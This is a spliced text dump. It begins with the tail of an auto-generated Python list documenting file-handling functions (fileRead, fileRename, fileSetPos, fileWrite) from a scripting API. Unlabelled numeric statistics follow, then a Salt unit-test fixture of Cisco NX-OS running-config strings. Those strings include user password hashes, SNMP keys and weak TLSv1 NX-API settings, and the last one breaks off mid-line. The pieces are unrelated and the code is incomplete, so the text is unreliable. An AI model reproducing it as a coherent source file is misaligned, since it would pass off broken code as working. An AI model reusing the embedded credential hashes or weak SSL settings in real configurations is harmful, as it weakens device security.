], ), docs=FunctionDoc( description='Reads the specified number of bytes from the given file starting at its current read/write position, and returns them as a string.' , arguments={ "theFile": """A handle to the file you wish to read from. Use fileOpen to obtain this handle. """, "count": """The number of bytes you wish to read. """ }, result='returns the bytes that were read in a string. note that this string might not contain as many bytes as you specified if an error occured, i.e. end of file.' , ), url='fileRead', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileRename', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='newFilePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Renames the specified file.' , arguments={ "filePath": """The filepath of the source file in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file. If the file is in the current resource, only the file path is necessary. """, "newFilePath": """Destination filepath for the specified source file in the same format. """ }, result='if successful, returns true. otherwise returns false.' , ), url='fileRename', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileRename', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['bool'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='filePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='newFilePath', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Renames the specified file.' , arguments={ "filePath": """The filepath of the source file in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file. If the file is in the current resource, only the file path is necessary. """, "newFilePath": """Destination filepath for the specified source file in the same format. """ }, result='if successful, returns true. otherwise returns false.' , ), url='fileRename', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileSetPos', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['int'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='offset', argument_type=FunctionType( names=['int'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Sets the current read/write position in the file.' , arguments={ "theFile": """The file handle of which you want to change the read/write position. """, "offset": """The new position. This is the number of bytes from the beginning of the file. If this value is larger than the file size, it is limited to 52,428,800 bytes (50 MB). """ }, result='returns where the offset was actually set at. i.e. if offset was past the end of the file, it will be set at the end of the file, and this position will be returned. returns false in case of failure (e.g. the specified file handle is invalid).' , ), url='fileSetPos', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileSetPos', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['int'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='offset', argument_type=FunctionType( names=['int'], is_optional=False, ), default_value=None, ) ] ], variable_length=False, ), generic_types=[ ], ), docs=FunctionDoc( description='Sets the current read/write position in the file.' , arguments={ "theFile": """The file handle of which you want to change the read/write position. """, "offset": """The new position. This is the number of bytes from the beginning of the file. If this value is larger than the file size, it is limited to 52,428,800 bytes (50 MB). """ }, result='returns where the offset was actually set at. i.e. if offset was past the end of the file, it will be set at the end of the file, and this position will be returned. returns false in case of failure (e.g. the specified file handle is invalid).' , ), url='fileSetPos', ) ], ), CompoundFunctionData( server=[ FunctionData( signature=FunctionSignature( name='fileWrite', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['int'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='string1', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='string2', argument_type=FunctionType( names=['string'], is_optional=True, ), default_value=None, ) ], [ FunctionArgument( name='string3', argument_type=FunctionType( names=['string'], is_optional=True, ), default_value=None, ) ] ], variable_length=True, ), generic_types=[ ], ), docs=FunctionDoc( description='Writes one or more strings to a given file, starting at the current read/write position. Advances the position over the number of bytes that were written.' , arguments={ "theFile": """A handle to the file you wish to write to. The file must have been opened with write access, i.e. the file handle must be a result of fileCreate or fileOpen with the readonly parameter set to false. """, "string1": """The string to write. """ }, result='returns the number of bytes successfully written to the file, returns false if invalid arguments were specified.' , ), url='fileWrite', ) ], client=[ FunctionData( signature=FunctionSignature( name='fileWrite', return_types=FunctionReturnTypes( return_types=[ FunctionType( names=['int'], is_optional=False, ) ], variable_length=False, ), arguments=FunctionArgumentValues( arguments=[ [ FunctionArgument( name='theFile', argument_type=FunctionType( names=['file'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='string1', argument_type=FunctionType( names=['string'], is_optional=False, ), default_value=None, ) ], [ FunctionArgument( name='string2', argument_type=FunctionType( names=['string'], is_optional=True, ), default_value=None, ) ], [ FunctionArgument( name='string3', argument_type=FunctionType( names=['string'], is_optional=True, ), default_value=None, ) ] ], variable_length=True, ), generic_types=[ ], ), docs=FunctionDoc( description='Writes one or more strings to a given file, starting at the current read/write position. Advances the position over the number of bytes that were written.' , arguments={ "theFile": """A handle to the file you wish to write to. The file must have been opened with write access, i.e. the file handle must be a result of fileCreate or fileOpen with the readonly parameter set to false. """, "string1": """The string to write. """ }, result='returns the number of bytes successfully written to the file, returns false if invalid arguments were specified.' , ), url='fileWrite', ) ], ) ]
42.759418
544
0.381652
4,260
64,695
5.719484
0.064789
0.033901
0.043095
0.057131
0.99134
0.987646
0.97164
0.97164
0.97164
0.97164
0
0.000967
0.552516
64,695
1,512
545
42.787698
0.840656
0.000788
0
0.846622
1
0.040541
0.237585
0.008818
0
0
0
0
0
1
0
false
0.002703
0.000676
0
0.000676
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
2dd59d9a50842904e792b27003a58e05d6f0615f
33,976
py
Python
tests/unit/modules/nxos/nxos_config.py
Noah-Huppert/salt
998c382f5f2c3b4cbf7d96aa6913ada6993909b3
[ "Apache-2.0" ]
19
2016-01-29T14:37:52.000Z
2022-03-30T18:08:01.000Z
tests/unit/modules/nxos/nxos_config.py
Noah-Huppert/salt
998c382f5f2c3b4cbf7d96aa6913ada6993909b3
[ "Apache-2.0" ]
223
2016-03-02T16:39:41.000Z
2022-03-03T12:26:35.000Z
tests/unit/modules/nxos/nxos_config.py
Noah-Huppert/salt
998c382f5f2c3b4cbf7d96aa6913ada6993909b3
[ "Apache-2.0" ]
64
2016-02-04T19:45:26.000Z
2021-12-15T02:02:31.000Z
# -*- coding: utf-8 -*- template_engine_file_str = "no feature ospf" config_result = [["no feature ospf"], [{}]] initial_config = [ "\n!Command: show running-config\n!Running configuration last done at: Wed Dec 4 15:33:48 2019\n!Time: Wed Dec 4 15:33:55 2019\n\nversion 9.2(4) Bios:version 07.66 \nhostname n9k-device\ninstall feature-set fex\nvdc n9k-device id 1\n allow feature-set fex\n limit-resource vlan minimum 16 maximum 4094\n limit-resource vrf minimum 2 maximum 4096\n limit-resource port-channel minimum 0 maximum 256\n limit-resource u4route-mem minimum 248 maximum 248\n limit-resource u6route-mem minimum 96 maximum 96\n limit-resource m4route-mem minimum 58 maximum 58\n limit-resource m6route-mem minimum 8 maximum 8\nfeature-set fex\n\nfeature privilege\nfeature telnet\nfeature nxapi\nfeature bash-shell\ncfs eth distribute\nfeature ngmvpn\nfeature ospf\nfeature pim\nfeature lldp\n\nusername admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin\nusername devops_user password 5 ! role network-operator\nusername devops_user passphrase lifetime 99999 warntime 14 gracetime 3\nusername salt_test password 5 $5$mkXh6O4T$YUVtA89HbXCnue63kgghPlaqPHyaXhdtxPBbPEHhbRC role network-operator\nusername salt_test passphrase lifetime 99999 warntime 14 gracetime 3\nip domain-lookup\nip name-server 1.1.1.1 2.2.2.2\nno system default switchport\nsystem default switchport shutdown\nno logging event link-status default\nno logging event link-status enable\nno logging event trunk-status enable\ntime-range ans-range\ntime-range my_range\ncopp profile strict\nsnmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey\nsnmp-server user devops_user network-operator \nsnmp-server user salt_test network-operator auth md5 0x3a16a4d0a569be282cc5fbc96138fac8 priv 0x3a16a4d0a569be282cc5fbc96138fac8 localizedkey\nrmon event 1 description FATAL(1) owner PMON@FATAL\nrmon event 2 description CRITICAL(2) owner PMON@CRITICAL\nrmon event 3 description ERROR(3) owner PMON@ERROR\nrmon event 4 description WARNING(4) owner PMON@WARNING\nrmon event 5 description INFORMATION(5) owner PMON@INFO\nno snmp-server enable traps entity entity_mib_change\nno snmp-server enable traps entity entity_module_status_change\nno snmp-server enable traps entity entity_power_status_change\nno snmp-server enable traps entity entity_module_inserted\nno snmp-server enable traps entity entity_module_removed\nno snmp-server enable traps entity entity_unrecognised_module\nno snmp-server enable traps entity entity_fan_status_change\nno snmp-server enable traps entity entity_power_out_change\nno snmp-server enable traps link linkDown\nno snmp-server enable traps link linkUp\nno snmp-server enable traps link extended-linkDown\nno snmp-server enable traps link extended-linkUp\nno snmp-server enable traps link cieLinkDown\nno snmp-server enable traps link cieLinkUp\nno snmp-server enable traps link delayed-link-state-change\nno snmp-server enable traps rf redundancy_framework\nno snmp-server enable traps license notify-license-expiry\nno snmp-server enable traps license notify-no-license-for-feature\nno snmp-server enable traps license notify-licensefile-missing\nno snmp-server enable traps license notify-license-expiry-warning\nno snmp-server enable traps upgrade UpgradeOpNotifyOnCompletion\nno snmp-server enable traps upgrade UpgradeJobStatusNotify\nno snmp-server enable traps rmon risingAlarm\nno snmp-server enable traps rmon fallingAlarm\nno snmp-server enable traps rmon hcRisingAlarm\nno snmp-server enable traps rmon hcFallingAlarm\nno snmp-server enable traps entity entity_sensor\nno snmp-server enable traps entity cefcMIBEnableStatusNotification\nno snmp-server enable traps generic coldStart\nno snmp-server enable traps generic warmStart\nno snmp-server enable traps storm-control cpscEventRev1\nno snmp-server enable traps link cErrDisableInterfaceEventRev1\nno snmp-server enable traps link cmn-mac-move-notification\nntp server 10.81.254.202 use-vrf management\n\nip pim ssm range none\nvlan 1\n\nvrf context management\n ip route 0.0.0.0/0 192.168.0.1\nvrf context myvrf\nvrf context testing\nnxapi http port 80\nno nxapi https\nnxapi ssl ciphers weak\nnxapi ssl protocols TLSv1 \n\n\ninterface port-channel19\n\ninterface port-channel42\n\ninterface port-channel55\n\ninterface port-channel66\n\ninterface Ethernet1/1\n\ninterface Ethernet1/2\n\ninterface Ethernet1/3\n no shutdown\n\ninterface Ethernet1/4\n\ninterface Ethernet1/5\n\ninterface Ethernet1/6\n\ninterface Ethernet1/7\n\ninterface Ethernet1/8\n\ninterface Ethernet1/9\n\ninterface Ethernet1/10\n\ninterface Ethernet1/11\n\ninterface Ethernet1/12\n\ninterface Ethernet1/13\n\ninterface Ethernet1/14\n\ninterface Ethernet1/15\n\ninterface Ethernet1/16\n\ninterface Ethernet1/17\n\ninterface Ethernet1/18\n\ninterface Ethernet1/19\n\ninterface Ethernet1/20\n\ninterface Ethernet1/21\n\ninterface Ethernet1/22\n\ninterface Ethernet1/23\n\ninterface Ethernet1/24\n\ninterface Ethernet1/25\n\ninterface Ethernet1/26\n\ninterface Ethernet1/27\n\ninterface Ethernet1/28\n\ninterface Ethernet1/29\n\ninterface Ethernet1/30\n\ninterface Ethernet1/31\n\ninterface Ethernet1/32\n\ninterface Ethernet1/33\n\ninterface Ethernet1/34\n\ninterface Ethernet1/35\n\ninterface Ethernet1/36\n\ninterface Ethernet1/37\n\ninterface Ethernet1/38\n\ninterface Ethernet1/39\n\ninterface Ethernet1/40\n\ninterface Ethernet1/41\n\ninterface Ethernet1/42\n\ninterface Ethernet1/43\n\ninterface Ethernet1/44\n\ninterface Ethernet1/45\n\ninterface Ethernet1/46\n\ninterface Ethernet1/47\n\ninterface Ethernet1/48\n\ninterface Ethernet2/1\n\ninterface Ethernet2/2\n\ninterface Ethernet2/3\n\ninterface Ethernet2/4\n\ninterface Ethernet2/5\n\ninterface Ethernet2/6\n\ninterface Ethernet2/7\n\ninterface Ethernet2/8\n\ninterface Ethernet2/9\n\ninterface Ethernet2/10\n\ninterface Ethernet2/11\n\ninterface Ethernet2/12\n\ninterface mgmt0\n vrf member management\n ip address 192.168.0.192/24\n\ninterface loopback0\n\ninterface loopback1\ncli alias name wr copy running startup-config\nline console\nline vty\nboot nxos bootflash:/nxos.9.2.4.bin \n\nno logging logfile\nno logging monitor\nno logging module\nno logging console\n\n\n" ] modified_config = [ "\n!Command: show running-config\n!Running configuration last done at: Wed Dec 4 15:33:56 2019\n!Time: Wed Dec 4 15:33:56 2019\n\nversion 9.2(4) Bios:version 07.66 \nhostname n9k-device\ninstall feature-set fex\nvdc n9k-device id 1\n allow feature-set fex\n limit-resource vlan minimum 16 maximum 4094\n limit-resource vrf minimum 2 maximum 4096\n limit-resource port-channel minimum 0 maximum 256\n limit-resource u4route-mem minimum 248 maximum 248\n limit-resource u6route-mem minimum 96 maximum 96\n limit-resource m4route-mem minimum 58 maximum 58\n limit-resource m6route-mem minimum 8 maximum 8\nfeature-set fex\n\nfeature privilege\nfeature telnet\nfeature nxapi\nfeature bash-shell\ncfs eth distribute\nfeature ngmvpn\nfeature pim\nfeature lldp\n\nusername admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin\nusername devops_user password 5 ! role network-operator\nusername devops_user passphrase lifetime 99999 warntime 14 gracetime 3\nusername salt_test password 5 $5$mkXh6O4T$YUVtA89HbXCnue63kgghPlaqPHyaXhdtxPBbPEHhbRC role network-operator\nusername salt_test passphrase lifetime 99999 warntime 14 gracetime 3\nip domain-lookup\nip name-server 1.1.1.1 2.2.2.2\nno system default switchport\nsystem default switchport shutdown\nno logging event link-status default\nno logging event link-status enable\nno logging event trunk-status enable\ntime-range ans-range\ntime-range my_range\ncopp profile strict\nsnmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey\nsnmp-server user devops_user network-operator \nsnmp-server user salt_test network-operator auth md5 0x3a16a4d0a569be282cc5fbc96138fac8 priv 0x3a16a4d0a569be282cc5fbc96138fac8 localizedkey\nrmon event 1 description FATAL(1) owner PMON@FATAL\nrmon event 2 description CRITICAL(2) owner PMON@CRITICAL\nrmon event 3 description ERROR(3) owner PMON@ERROR\nrmon event 4 description WARNING(4) owner PMON@WARNING\nrmon event 5 description INFORMATION(5) owner PMON@INFO\nno snmp-server enable traps entity entity_mib_change\nno snmp-server enable traps entity entity_module_status_change\nno snmp-server enable traps entity entity_power_status_change\nno snmp-server enable traps entity entity_module_inserted\nno snmp-server enable traps entity entity_module_removed\nno snmp-server enable traps entity entity_unrecognised_module\nno snmp-server enable traps entity entity_fan_status_change\nno snmp-server enable traps entity entity_power_out_change\nno snmp-server enable traps link linkDown\nno snmp-server enable traps link linkUp\nno snmp-server enable traps link extended-linkDown\nno snmp-server enable traps link extended-linkUp\nno snmp-server enable traps link cieLinkDown\nno snmp-server enable traps link cieLinkUp\nno snmp-server enable traps link delayed-link-state-change\nno snmp-server enable traps rf redundancy_framework\nno snmp-server enable traps license notify-license-expiry\nno snmp-server enable traps license notify-no-license-for-feature\nno snmp-server enable traps license notify-licensefile-missing\nno snmp-server enable traps license notify-license-expiry-warning\nno snmp-server enable traps upgrade UpgradeOpNotifyOnCompletion\nno snmp-server enable traps upgrade UpgradeJobStatusNotify\nno snmp-server enable traps rmon risingAlarm\nno snmp-server enable traps rmon fallingAlarm\nno snmp-server enable traps rmon hcRisingAlarm\nno snmp-server enable traps rmon hcFallingAlarm\nno snmp-server enable traps entity entity_sensor\nno snmp-server enable traps entity cefcMIBEnableStatusNotification\nno snmp-server enable traps generic coldStart\nno snmp-server enable traps generic warmStart\nno snmp-server enable traps storm-control cpscEventRev1\nno snmp-server enable traps link cErrDisableInterfaceEventRev1\nno snmp-server enable traps link cmn-mac-move-notification\nntp server 10.81.254.202 use-vrf management\n\nip pim ssm range none\nvlan 1\n\nvrf context management\n ip route 0.0.0.0/0 192.168.0.1\nvrf context myvrf\nvrf context testing\nnxapi http port 80\nno nxapi https\nnxapi ssl ciphers weak\nnxapi ssl protocols TLSv1 \n\n\ninterface port-channel19\n\ninterface port-channel42\n\ninterface port-channel55\n\ninterface port-channel66\n\ninterface Ethernet1/1\n\ninterface Ethernet1/2\n\ninterface Ethernet1/3\n no shutdown\n\ninterface Ethernet1/4\n\ninterface Ethernet1/5\n\ninterface Ethernet1/6\n\ninterface Ethernet1/7\n\ninterface Ethernet1/8\n\ninterface Ethernet1/9\n\ninterface Ethernet1/10\n\ninterface Ethernet1/11\n\ninterface Ethernet1/12\n\ninterface Ethernet1/13\n\ninterface Ethernet1/14\n\ninterface Ethernet1/15\n\ninterface Ethernet1/16\n\ninterface Ethernet1/17\n\ninterface Ethernet1/18\n\ninterface Ethernet1/19\n\ninterface Ethernet1/20\n\ninterface Ethernet1/21\n\ninterface Ethernet1/22\n\ninterface Ethernet1/23\n\ninterface Ethernet1/24\n\ninterface Ethernet1/25\n\ninterface Ethernet1/26\n\ninterface Ethernet1/27\n\ninterface Ethernet1/28\n\ninterface Ethernet1/29\n\ninterface Ethernet1/30\n\ninterface Ethernet1/31\n\ninterface Ethernet1/32\n\ninterface Ethernet1/33\n\ninterface Ethernet1/34\n\ninterface Ethernet1/35\n\ninterface Ethernet1/36\n\ninterface Ethernet1/37\n\ninterface Ethernet1/38\n\ninterface Ethernet1/39\n\ninterface Ethernet1/40\n\ninterface Ethernet1/41\n\ninterface Ethernet1/42\n\ninterface Ethernet1/43\n\ninterface Ethernet1/44\n\ninterface Ethernet1/45\n\ninterface Ethernet1/46\n\ninterface Ethernet1/47\n\ninterface Ethernet1/48\n\ninterface Ethernet2/1\n\ninterface Ethernet2/2\n\ninterface Ethernet2/3\n\ninterface Ethernet2/4\n\ninterface Ethernet2/5\n\ninterface Ethernet2/6\n\ninterface Ethernet2/7\n\ninterface Ethernet2/8\n\ninterface Ethernet2/9\n\ninterface Ethernet2/10\n\ninterface Ethernet2/11\n\ninterface Ethernet2/12\n\ninterface mgmt0\n vrf member management\n ip address 192.168.0.192/24\n\ninterface loopback0\n\ninterface loopback1\ncli alias name wr copy running startup-config\nline console\nline vty\nboot nxos bootflash:/nxos.9.2.4.bin \n\nno logging logfile\nno logging monitor\nno logging module\nno logging console\n\n\n" ] config_input_file = """ feature bgp ! router bgp 55 address-family ipv4 unicast no client-to-client reflection additional-paths send """ template_engine_file_str_file = config_input_file config_result_file = [ [ "feature bgp", "!", "router bgp 55", " address-family ipv4 unicast", " no client-to-client reflection", " additional-paths send", ], [{}, {}, {}, {}, {}, {}], ] initial_config_file = [ "\n!Command: show running-config\n!Running configuration last done at: Wed Dec 4 15:33:56 2019\n!Time: Wed Dec 4 15:55:51 2019\n\nversion 9.2(4) Bios:version 07.66 \nhostname dt-n9k5-1\ninstall feature-set fex\nvdc dt-n9k5-1 id 1\n allow feature-set fex\n limit-resource vlan minimum 16 maximum 4094\n limit-resource vrf minimum 2 maximum 4096\n limit-resource port-channel minimum 0 maximum 256\n limit-resource u4route-mem minimum 248 maximum 248\n limit-resource u6route-mem minimum 96 maximum 96\n limit-resource m4route-mem minimum 58 maximum 58\n limit-resource m6route-mem minimum 8 maximum 8\nfeature-set fex\n\nfeature privilege\nfeature telnet\nfeature nxapi\nfeature bash-shell\ncfs eth distribute\nfeature ngmvpn\nfeature pim\nfeature lldp\n\nusername admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin\nusername devops_user password 5 ! role network-operator\nusername devops_user passphrase lifetime 99999 warntime 14 gracetime 3\nusername salt_test password 5 $5$mkXh6O4T$YUVtA89HbXCnue63kgghPlaqPHyaXhdtxPBbPEHhbRC role network-operator\nusername salt_test passphrase lifetime 99999 warntime 14 gracetime 3\nip domain-lookup\nip name-server 1.1.1.1 2.2.2.2\nno system default switchport\nsystem default switchport shutdown\nno logging event link-status default\nno logging event link-status enable\nno logging event trunk-status enable\ntime-range ans-range\ntime-range my_range\ncopp profile strict\nsnmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey\nsnmp-server user devops_user network-operator \nsnmp-server user salt_test network-operator auth md5 0x3a16a4d0a569be282cc5fbc96138fac8 priv 0x3a16a4d0a569be282cc5fbc96138fac8 localizedkey\nrmon event 1 description FATAL(1) owner PMON@FATAL\nrmon event 2 description CRITICAL(2) owner PMON@CRITICAL\nrmon event 3 description ERROR(3) owner PMON@ERROR\nrmon event 4 description WARNING(4) owner PMON@WARNING\nrmon event 5 description INFORMATION(5) owner PMON@INFO\nno snmp-server enable traps entity entity_mib_change\nno snmp-server enable traps entity entity_module_status_change\nno snmp-server enable traps entity entity_power_status_change\nno snmp-server enable traps entity entity_module_inserted\nno snmp-server enable traps entity entity_module_removed\nno snmp-server enable traps entity entity_unrecognised_module\nno snmp-server enable traps entity entity_fan_status_change\nno snmp-server enable traps entity entity_power_out_change\nno snmp-server enable traps link linkDown\nno snmp-server enable traps link linkUp\nno snmp-server enable traps link extended-linkDown\nno snmp-server enable traps link extended-linkUp\nno snmp-server enable traps link cieLinkDown\nno snmp-server enable traps link cieLinkUp\nno snmp-server enable traps link delayed-link-state-change\nno snmp-server enable traps rf redundancy_framework\nno snmp-server enable traps license notify-license-expiry\nno snmp-server enable traps license notify-no-license-for-feature\nno snmp-server enable traps license notify-licensefile-missing\nno snmp-server enable traps license notify-license-expiry-warning\nno snmp-server enable traps upgrade UpgradeOpNotifyOnCompletion\nno snmp-server enable traps upgrade UpgradeJobStatusNotify\nno snmp-server enable traps rmon risingAlarm\nno snmp-server enable traps rmon fallingAlarm\nno snmp-server enable traps rmon hcRisingAlarm\nno snmp-server enable traps rmon hcFallingAlarm\nno snmp-server enable traps entity entity_sensor\nno snmp-server enable traps entity cefcMIBEnableStatusNotification\nno snmp-server enable traps generic coldStart\nno snmp-server enable traps generic warmStart\nno snmp-server enable traps storm-control cpscEventRev1\nno snmp-server enable traps link cErrDisableInterfaceEventRev1\nno snmp-server enable traps link cmn-mac-move-notification\nntp server 10.81.254.202 use-vrf management\n\nip pim ssm range none\nvlan 1\n\nvrf context management\n ip route 0.0.0.0/0 10.122.197.1\nvrf context myvrf\nvrf context testing\nnxapi http port 80\nno nxapi https\nnxapi ssl ciphers weak\nnxapi ssl protocols TLSv1 \n\n\ninterface port-channel19\n\ninterface port-channel42\n\ninterface port-channel55\n\ninterface port-channel66\n\ninterface Ethernet1/1\n\ninterface Ethernet1/2\n\ninterface Ethernet1/3\n no shutdown\n\ninterface Ethernet1/4\n\ninterface Ethernet1/5\n\ninterface Ethernet1/6\n\ninterface Ethernet1/7\n\ninterface Ethernet1/8\n\ninterface Ethernet1/9\n\ninterface Ethernet1/10\n\ninterface Ethernet1/11\n\ninterface Ethernet1/12\n\ninterface Ethernet1/13\n\ninterface Ethernet1/14\n\ninterface Ethernet1/15\n\ninterface Ethernet1/16\n\ninterface Ethernet1/17\n\ninterface Ethernet1/18\n\ninterface Ethernet1/19\n\ninterface Ethernet1/20\n\ninterface Ethernet1/21\n\ninterface Ethernet1/22\n\ninterface Ethernet1/23\n\ninterface Ethernet1/24\n\ninterface Ethernet1/25\n\ninterface Ethernet1/26\n\ninterface Ethernet1/27\n\ninterface Ethernet1/28\n\ninterface Ethernet1/29\n\ninterface Ethernet1/30\n\ninterface Ethernet1/31\n\ninterface Ethernet1/32\n\ninterface Ethernet1/33\n\ninterface Ethernet1/34\n\ninterface Ethernet1/35\n\ninterface Ethernet1/36\n\ninterface Ethernet1/37\n\ninterface Ethernet1/38\n\ninterface Ethernet1/39\n\ninterface Ethernet1/40\n\ninterface Ethernet1/41\n\ninterface Ethernet1/42\n\ninterface Ethernet1/43\n\ninterface Ethernet1/44\n\ninterface Ethernet1/45\n\ninterface Ethernet1/46\n\ninterface Ethernet1/47\n\ninterface Ethernet1/48\n\ninterface Ethernet2/1\n\ninterface Ethernet2/2\n\ninterface Ethernet2/3\n\ninterface Ethernet2/4\n\ninterface Ethernet2/5\n\ninterface Ethernet2/6\n\ninterface Ethernet2/7\n\ninterface Ethernet2/8\n\ninterface Ethernet2/9\n\ninterface Ethernet2/10\n\ninterface Ethernet2/11\n\ninterface Ethernet2/12\n\ninterface mgmt0\n vrf member management\n ip address 10.122.197.192/24\n\ninterface loopback0\n\ninterface loopback1\ncli alias name wr copy running startup-config\nline console\nline vty\nboot nxos bootflash:/nxos.9.2.4.bin \n\nno logging logfile\nno logging monitor\nno logging module\nno logging console\n\n\n" ] modified_config_file = [ "\n!Command: show running-config\n!Running configuration last done at: Wed Dec 4 15:55:55 2019\n!Time: Wed Dec 4 15:55:55 2019\n\nversion 9.2(4) Bios:version 07.66 \nhostname dt-n9k5-1\ninstall feature-set fex\nvdc dt-n9k5-1 id 1\n allow feature-set fex\n limit-resource vlan minimum 16 maximum 4094\n limit-resource vrf minimum 2 maximum 4096\n limit-resource port-channel minimum 0 maximum 256\n limit-resource u4route-mem minimum 248 maximum 248\n limit-resource u6route-mem minimum 96 maximum 96\n limit-resource m4route-mem minimum 58 maximum 58\n limit-resource m6route-mem minimum 8 maximum 8\nfeature-set fex\n\nfeature privilege\nfeature telnet\nfeature nxapi\nfeature bash-shell\ncfs eth distribute\nfeature ngmvpn\nfeature bgp\nfeature pim\nfeature lldp\n\nusername admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin\nusername devops_user password 5 ! role network-operator\nusername devops_user passphrase lifetime 99999 warntime 14 gracetime 3\nusername salt_test password 5 $5$mkXh6O4T$YUVtA89HbXCnue63kgghPlaqPHyaXhdtxPBbPEHhbRC role network-operator\nusername salt_test passphrase lifetime 99999 warntime 14 gracetime 3\nip domain-lookup\nip name-server 1.1.1.1 2.2.2.2\nno system default switchport\nsystem default switchport shutdown\nno logging event link-status default\nno logging event link-status enable\nno logging event trunk-status enable\ntime-range ans-range\ntime-range my_range\ncopp profile strict\nsnmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey\nsnmp-server user devops_user network-operator \nsnmp-server user salt_test network-operator auth md5 0x3a16a4d0a569be282cc5fbc96138fac8 priv 0x3a16a4d0a569be282cc5fbc96138fac8 localizedkey\nrmon event 1 description FATAL(1) owner PMON@FATAL\nrmon event 2 description CRITICAL(2) owner PMON@CRITICAL\nrmon event 3 description ERROR(3) owner PMON@ERROR\nrmon event 4 description WARNING(4) owner PMON@WARNING\nrmon event 5 description INFORMATION(5) owner PMON@INFO\nno snmp-server enable traps entity entity_mib_change\nno snmp-server enable traps entity entity_module_status_change\nno snmp-server enable traps entity entity_power_status_change\nno snmp-server enable traps entity entity_module_inserted\nno snmp-server enable traps entity entity_module_removed\nno snmp-server enable traps entity entity_unrecognised_module\nno snmp-server enable traps entity entity_fan_status_change\nno snmp-server enable traps entity entity_power_out_change\nno snmp-server enable traps link linkDown\nno snmp-server enable traps link linkUp\nno snmp-server enable traps link extended-linkDown\nno snmp-server enable traps link extended-linkUp\nno snmp-server enable traps link cieLinkDown\nno snmp-server enable traps link cieLinkUp\nno snmp-server enable traps link delayed-link-state-change\nno snmp-server enable traps rf redundancy_framework\nno snmp-server enable traps license notify-license-expiry\nno snmp-server enable traps license notify-no-license-for-feature\nno snmp-server enable traps license notify-licensefile-missing\nno snmp-server enable traps license notify-license-expiry-warning\nno snmp-server enable traps upgrade UpgradeOpNotifyOnCompletion\nno snmp-server enable traps upgrade UpgradeJobStatusNotify\nno snmp-server enable traps rmon risingAlarm\nno snmp-server enable traps rmon fallingAlarm\nno snmp-server enable traps rmon hcRisingAlarm\nno snmp-server enable traps rmon hcFallingAlarm\nno snmp-server enable traps entity entity_sensor\nno snmp-server enable traps entity cefcMIBEnableStatusNotification\nno snmp-server enable traps generic coldStart\nno snmp-server enable traps generic warmStart\nno snmp-server enable traps storm-control cpscEventRev1\nno snmp-server enable traps link cErrDisableInterfaceEventRev1\nno snmp-server enable traps link cmn-mac-move-notification\nntp server 10.81.254.202 use-vrf management\n\nip pim ssm range none\nvlan 1\n\nvrf context management\n ip route 0.0.0.0/0 10.122.197.1\nvrf context myvrf\nvrf context testing\nnxapi http port 80\nno nxapi https\nnxapi ssl ciphers weak\nnxapi ssl protocols TLSv1 \n\n\ninterface port-channel19\n\ninterface port-channel42\n\ninterface port-channel55\n\ninterface port-channel66\n\ninterface Ethernet1/1\n\ninterface Ethernet1/2\n\ninterface Ethernet1/3\n no shutdown\n\ninterface Ethernet1/4\n\ninterface Ethernet1/5\n\ninterface Ethernet1/6\n\ninterface Ethernet1/7\n\ninterface Ethernet1/8\n\ninterface Ethernet1/9\n\ninterface Ethernet1/10\n\ninterface Ethernet1/11\n\ninterface Ethernet1/12\n\ninterface 